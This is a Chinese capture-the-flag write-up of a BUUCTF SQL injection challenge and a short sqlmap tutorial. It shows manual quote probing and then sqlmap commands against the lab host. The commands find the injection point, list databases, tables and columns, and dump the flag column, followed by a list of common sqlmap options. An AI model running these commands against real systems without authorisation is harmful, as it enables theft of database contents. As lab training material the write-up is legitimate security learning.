[第一章 web入门]SQL注入-1 及sqlmap的简单使用

跟着题目来学习一下sqlmap的简单使用

首先?id=1是如下结果

image-20210828220123213

id=1’

image-20210828220155247

id=1’’

image-20210828220419275

判断存在注入点,这里直接展示sqlmap

1、判断是否存在注入点

python sqlmap.py -u http://18a64bdf-b7b2-44a9-8935-83536c6010e4.node4.buuoj.cn:81/index.php?id=1

image-20210828220636098

2、查看所有数据库

python sqlmap.py -u http://18a64bdf-b7b2-44a9-8935-83536c6010e4.node4.buuoj.cn:81/index.php?id=1 --dbs

image-20210828220851848

3、查看数据中的列表

python sqlmap.py -u http://18a64bdf-b7b2-44a9-8935-83536c6010e4.node4.buuoj.cn:81/index.php?id=1 -D mysql -tables

image-20210828221030085

4、查看列表中的字段

python sqlmap.py -u http://18a64bdf-b7b2-44a9-8935-83536c6010e4.node4.buuoj.cn:81/index.php?id=1 -D note -T fl4g --columns

image-20210828221041910

5、查看字段的内容

python sqlmap.py -u http://18a64bdf-b7b2-44a9-8935-83536c6010e4.node4.buuoj.cn:81/index.php?id=1 -D note -T fl4g -C fllllag --dump

image-20210828221145496

6、然后还有一些其他的

-p 指定测试参数
-b 获取banner
--is-dba 是否为管理员权限
--current-user 查看当前数据库
--current-user 查看当前用户
--count 检索所有数据数量
--level 测试等级(1-5)默认为1
-v 显示详细信息
-D 指定数据库
-T 指定表
-C 指定列
(大写)

DBA:True表示是管理员权限

image-20210828221840024

用户

image-20210828221933347

当前数据库

image-20210828222007107

Logo

魔乐社区(Modelers.cn) 是一个中立、公益的人工智能社区,提供人工智能工具、模型、数据的托管、展示与应用协同服务,为人工智能开发及爱好者搭建开放的学习交流平台。社区通过理事会方式运作,由全产业链共同建设、共同运营、共同享有,推动国产AI生态繁荣发展。

更多推荐